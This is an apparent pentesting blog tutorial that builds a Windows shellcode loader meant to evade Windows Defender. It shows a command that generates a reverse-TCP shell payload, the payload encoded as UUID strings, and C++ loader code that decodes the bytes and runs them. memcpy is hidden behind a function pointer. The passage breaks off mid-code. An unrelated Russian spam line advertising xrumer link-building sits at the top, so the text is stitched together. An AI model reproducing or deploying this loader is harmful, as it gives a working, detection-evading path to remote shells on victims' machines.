it-security_windows_kali_pentest_obfuscation_blog_english
Оптимальный результат дадут свежие базы для xrumer <a href=https://www.olx.ua/d/uk/obyavlenie/progon-hrumerom-dr-50-po-ahrefs-uvelichu-reyting-domena-IDXnHrG.html>https://www.olx.ua/d/uk/obyavlenie/progon-hrumerom-dr-50-po-ahrefs-uvelichu-reyting-domena-IDXnHrG.html</a>, содержащие актуальные ссылки.
Tools
The encoder is part of my shellcode tool ShenCode, which is available as open source.
Step1: Prepare shellcode
generate
We create a payload without further encryption or encoding. This is usually recognised by Windows Defender.
<code bash> python shencode.py create -c="-p windows/x64/shell/reverse_tcp LHOST=IPADDRESS LPORT=PORT -f raw -o shell_rev.raw" </code>
encode
We now encode this payload as UUID strings.
<code bash> python shencode.py encode -f shell_rev.raw -u </code>
The output now looks something like this:
<code cpp> [*] try to open file [+] reading 240906.001 successful! [*] try to generate UUIDs std::vector<std::string> sID = { "fce88f00-0000-6031-d264-8b523089e58b", "520c8b52-148b-7228-0fb7-4a2631ff31c0", "ac3c617c-022c-20c1-cf0d-01c74975ef52", "578b5210-8b42-3c01-d08b-407885c0744c", … "c85fffd5-83f8-007d-2858-68004000006a", "0050680b-2f0f-30ff-d557-68756e4d61ff", "d55e5eff-0c24-0f85-70ff-ffffe99bffff", "ff01c329-c675-c1c3-bbf0-b5a2566a0053", "ffd5" }; [+] DONE! </code>
Step 2: Write Inject.cpp
Header
obfuscated shellcode
We create a new C++ project and adopt the obfuscated string array that we created previously.
<code cpp> #include <stdio.h> #include <windows.h> #include <iostream> #include <sstream> #include <vector> #include <iomanip> #pragma warning
std::vector<std::string> sID = { "fce88f00-0000-6031-d264-8b523089e58b", "520c8b52-148b-7228-0fb7-4a2631ff31c0", "ac3c617c-022c-20c1-cf0d-01c74975ef52", "578b5210-8b42-3c01-d08b-407885c0744c", … "c85fffd5-83f8-007d-2858-68004000006a", "0050680b-2f0f-30ff-d557-68756e4d61ff", "d55e5eff-0c24-0f85-70ff-ffffe99bffff", "ff01c329-c675-c1c3-bbf0-b5a2566a0053", "ffd5" }; </code>
Encoding and injection
Remove superfluous characters
Firstly, we need a function to remove the ''-'' characters. We pass a string to this function, which is then cleaned up.
<code cpp> void removeDashes(std::string& str) { str.erase(std::remove(str.begin(), str.end(), '-'), str.end()); } </code>
Convert strings to bytes
The next function converts the UUID strings into executable bytes. The string array is run through piece by piece:
* Remove from ''-'' * Read 2 characters and return them as bytes * When the string array has been run through, return the generated byte array to the caller
<code cpp> std::vector<uint8_t> convertToBytes(const std::vector<std::string>& inputStrings) { std::vector<uint8_t> byteArray; for (const auto& str : inputStrings) { std::string cleanStr = str; removeDashes(cleanStr); for (size_t i = 0; i < cleanStr.length(); i += 2) { if (i + 1 < cleanStr.length()) { std::string byteString = cleanStr.substr(i, 2); uint8_t byte = static_cast<uint8_t>(std::stoi(byteString, nullptr, 16)); byteArray.push_back(byte); } } } return byteArray; } </code>
Main programme
The main program initialises the variables, calls the conversion function, outputs the bytes to the console and then executes the injection.
To disguise this process somewhat, the function ''memcpy'' is not called directly, but linked to our own function via a pointer.
<code cpp> int main() { std::vector<std::string> input = sID; std::vector<uint8_t> result = convertToBytes(input); unsigned char* Payload = reinterpret_cast<unsigned char*>(result.data()); size_t byteArrayLength = result.size(); std::cout << "[x] Payload size: " << byteArrayLength << " bytes" << std::endl;
for (size_t i = 0; i < byteArrayLength; ++i) { std::cout << std::hex << std::setw(2) << std::setfill('0') << static_cast<int>(Payload[i]) << " "; if ((i + 1) % 8 == 0) { std::cout << st